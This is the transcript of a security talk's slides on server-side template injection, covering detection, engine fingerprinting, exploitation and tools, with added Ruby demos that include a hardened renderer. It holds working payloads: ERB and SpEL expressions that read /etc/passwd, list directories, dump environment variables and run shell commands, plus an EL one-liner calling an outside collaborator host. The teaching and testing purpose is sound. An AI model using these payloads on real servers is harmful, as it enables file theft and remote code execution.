
Server Side Template Injection

Dhamu
September 25, 2021


Transcript

  1. Server Side Template Injection

  2. Whoami
    Dhamotharan
    Offensive Web Application Security Researcher
    Occasional bug bounty hunter on HackerOne, Bugcrowd, etc.
    Dhamu_offi on twitter

  3. AGENDA
    Template Injection
    What is SSTI
    Methodology
    Automated Tools
    Cheatsheet
    Demo

  4. Template Injection
    Template injection allows an attacker to get template directives into a template the
    application renders, either by modifying an existing template or by having the
    application build a new one from attacker-controlled input. A template engine makes
    designing HTML pages easier by using static template files which, at runtime, replace
    variables/placeholders with actual values in the HTML pages.

  5. Template Injection
    Template engines are designed to combine templates with a data model to produce result
    documents, which helps populate dynamic data into web pages. Template engines can be
    used to display information about users, products, etc. Some of the most popular template
    engines are:
    ● PHP – Smarty, Twig
    ● Java – Velocity, FreeMarker
    ● Python – Jinja2, Mako, Tornado
    ● JavaScript – Jade (now Pug), Rage
    ● Ruby – Liquid, ERB, Slim

  6. Server Side Template Injection (SSTI)
    Tip
    Server-side template injection is a vulnerability where the attacker injects
    malicious input into a template to execute commands on the server side.

  7. SSTI
    Server-side template injection is a vulnerability where the attacker injects
    malicious input into a template to execute commands on the server side. It occurs
    when untrusted user input is embedded directly into the template source, rather than
    handed to the engine as data, which generally leads to remote code execution (RCE).

  8. Tip
    Probes that a vulnerable engine evaluates to 49 instead of echoing back:
    ${7*7}
    ${{7*7}}
    #{ 7 * 7 }
    <%= 7 * 7 %>

  9. Server Side Template Injection Methodology

  10. Methodology
    ➔ Detect
    ➔ Identify
    ➔ Exploit

  11. Detect
    This vulnerability can appear in two distinct contexts, each of which requires
    its own detection method:
    1. Plaintext context
    2. Code context
    Tip (story for illustration purposes only)
    smarty=Hello {user.name}
    Hello user1
    smarty=Hello ${7*7}
    Hello 49
    Tip
    personal_greeting=username
    Hello user0

  12. Plaintext context
    The given input is being rendered and reflected into the response.
    Try to set mathematical operations within a template expression:
    Tip
    render('Hello ' + username)
    http://vulnerable-website.com/?username=${7*7}
    {{7*7}}
    ${7*7}
    <%= 7*7 %>
    ${{7*7}}

  13. Code Context
    In these cases the user input is being placed within a template expression:
    Tip
    greeting = getQueryParameter('greeting')
    engine.render("Hello {{"+greeting+"}}", data)
    http://vulnerable-website.com/?greeting=data.username}}

  14. Identify
    Once template injection potential has been detected, the next step is to identify the
    template engine in use. Although there are a huge number of templating languages, many of
    them use very similar syntax that is specifically chosen not to clash with HTML characters.
    As a result, it is relatively simple to create probing payloads that tell the engines apart
    by how they evaluate the same input: {{7*'7'}}, for example, renders as 49 in Twig but as
    7777777 in Jinja2.
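    As an added example (not part of the deck): the Detect and Identify steps from slides 11 to 14, run as a Ruby script against a vulnerable ERB renderer. ERB is Ruby's standard-library engine and is the one the cheatsheet uses, so this runs offline with no target. The probe strings are the ones on the slides; the engine names attached to each syntax family, the function names and the negative-control renderer are this example's own assumptions.

```ruby
require "erb"

# Probe set from the deck's detection slides, keyed by syntax family.
# The engine names per family are the common ones and are an illustration
# only (assumption); confirm with engine-specific probes afterwards.
# Single quotes matter: in double quotes Ruby would interpolate '#{7*7}'.
PROBES = {
  '${7*7}'     => "dollar-brace (EL, FreeMarker, Velocity)",
  '{{7*7}}'    => "double-brace (Jinja2, Twig, Nunjucks)",
  '<%= 7*7 %>' => "ERB-style (ERB, EJS)",
  '#{7*7}'     => "hash-brace (Slim, Pug)",
}.freeze

# Vulnerable plaintext context (slide 12 pattern): the request value is
# concatenated into the template source, so an ERB tag in it is compiled
# and executed by the engine.
def vulnerable_render(username)
  ERB.new("Hello " + username).result(binding)
end

# Vulnerable code context (slide 13 pattern): the value lands inside an
# existing expression, so the probe is bare arithmetic with no delimiters.
def code_context_render(greeting)
  ERB.new("Hello <%= " + greeting + " %>").result(binding)
end

# Negative control: plain string reflection, no template engine involved.
# The probe comes back verbatim, which a naive "is it reflected?" check
# would otherwise count as a finding.
def reflect_only(username)
  "Hello " + username
end

# Detect and identify in one pass: send each probe through the renderer
# and keep the families whose arithmetic was evaluated. Requiring both
# that 49 appears and that the literal probe is gone rules out reflection.
def fingerprint(renderer)
  PROBES.select do |probe, _family|
    out = renderer.call(probe)
    out.include?("49") && !out.include?(probe)
  end.values
end

if $PROGRAM_NAME == __FILE__
  puts "vulnerable renderer: #{fingerprint(method(:vulnerable_render)).inspect}"
  puts "reflection only:     #{fingerprint(method(:reflect_only)).inspect}"
  puts "code context probe:  #{code_context_render('7*7').inspect}"
end
```

    Against the vulnerable renderer only the ERB-style family evaluates, which is the identification result; against plain reflection nothing does. In practice, once the family is known, follow up with engine-specific probes (the {{7*'7'}} trick above) before picking payloads from the cheatsheet.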

  15. Exploit
    The cheatsheet slides walk through several template engines to show the exploit
    methodology in practice and to make a case for the severity of the issue. The findings
    may appear to show flaws in the template engines themselves, but unless an engine markets
    itself as suitable for user-submitted templates, the responsibility for preventing
    template injection ultimately lies with web application developers.
    Once the engine is identified, read its documentation for:
    ● Lists of builtin methods, functions, filters, and variables.
    ● Lists of extensions/plugins - some may be enabled by default.

  16. Exploit
    Generic
    In this wordlist you can find variables defined in the environments of some of the
    engines covered in this deck:
    https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt
    https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

  17. Automated Tools
    Tplmap assists in the exploitation of Code Injection and Server-Side Template
    Injection vulnerabilities with several sandbox escape techniques to get access to the
    underlying operating system.
    The tool and its test suite are developed to research the SSTI vulnerability class and to
    be used as offensive security tools during web application penetration tests.

  18. CheatSheet
    ● Ruby
    ○ Basic injections
    ○ Retrieve /etc/passwd
    ○ List files and directories
    ● Java
    ○ Basic injection
    ○ Retrieve the system’s environment variables
    ○ Retrieve /etc/passwd
    ● Expression Language EL
    ○ Basic injection
    ○ Code execution

  19. Ruby - Basic injections
    ERB:
    <%= 7 * 7 %>
    Slim:
    #{ 7 * 7 }
    Ruby - Retrieve /etc/passwd
    <%= File.open('/etc/passwd').read %>
    Ruby - List files and directories
    <%= Dir.entries('/') %>
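    Added example, not from the deck or its linked repository: the two Ruby payloads on this slide fired at the same concatenation bug from the Detect slides, aimed at a constructed temp file instead of /etc/passwd and / so the script is safe to run anywhere, beside the hardened pattern the Exploit slide puts on developers (fixed template, user value passed as data). The function names and the fixture contents are this example's assumptions.

```ruby
require "erb"
require "tmpdir"

# Same vulnerable pattern as the deck's plaintext-context example: the
# request value is concatenated into the template source.
def vulnerable_render(user_input)
  ERB.new("Hello " + user_input).result(binding)
end

# Hardened counterpart: the template is a fixed string, the user value is
# data bound at render time and HTML-escaped on output. Changing the value
# can never change the program the engine compiles.
def safe_render(user_input)
  ERB.new("Hello <%= ERB::Util.html_escape(user_input) %>").result(binding)
end

# The deck's two Ruby payloads, parameterised on a path so they can be
# pointed at a scratch file. Against a real target the path would be
# /etc/passwd and / respectively.
def read_file_payload(path)
  "<%= File.open(#{path.inspect}).read %>"
end

def list_dir_payload(path)
  "<%= Dir.entries(#{path.inspect}).sort.join(',') %>"
end

# Run both payloads against a constructed fixture (a temp directory holding
# a fake secret) and return what each renderer produced. The directory is
# removed when the block exits.
def demo
  Dir.mktmpdir("ssti-demo") do |dir|
    secret = File.join(dir, "secret.txt")
    File.write(secret, "db_password=hunter2\n")   # constructed sample data
    {
      leaked_file: vulnerable_render(read_file_payload(secret)),
      listed_dir:  vulnerable_render(list_dir_payload(dir)),
      hardened:    safe_render(read_file_payload(secret)),
    }
  end
end

if $PROGRAM_NAME == __FILE__
  demo.each { |name, output| puts "#{name}: #{output.inspect}" }
end
```

    The first two results show the payload reading and listing the fixture through the vulnerable renderer; the third shows the identical payload coming back from the hardened renderer as inert text. The escaping is not what stops the injection (it only covers the separate XSS problem): the fix is that the user value never becomes part of the template source.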

  20. Java - Basic injection
    ${7*7}
    ${class.getClassLoader()}
    Java - Retrieve the system's environment variables
    ${T(java.lang.System).getenv()}
    Java - Retrieve /etc/passwd
    ${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
    Note: the T(...) type operator is Spring Expression Language (SpEL) syntax, so the last
    two payloads apply to SpEL-backed views (e.g. Thymeleaf in a Spring application), not to
    FreeMarker or Velocity. exec() returns a Process object: the command runs, but its output
    is only reflected in the page if the payload also reads the process's input stream.

  21. Expression Language EL
    Expression Language EL - Basic injection
    ${1+1}
    #{1+1}
    Expression Language EL - One-liner injections not including code execution
    // DNS Lookup
    ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}

  22. Server-Side-Template-Injection - Linux - Privilege Escalation
    https://github.com/Dhamuharker/Server-Side-Template-Injection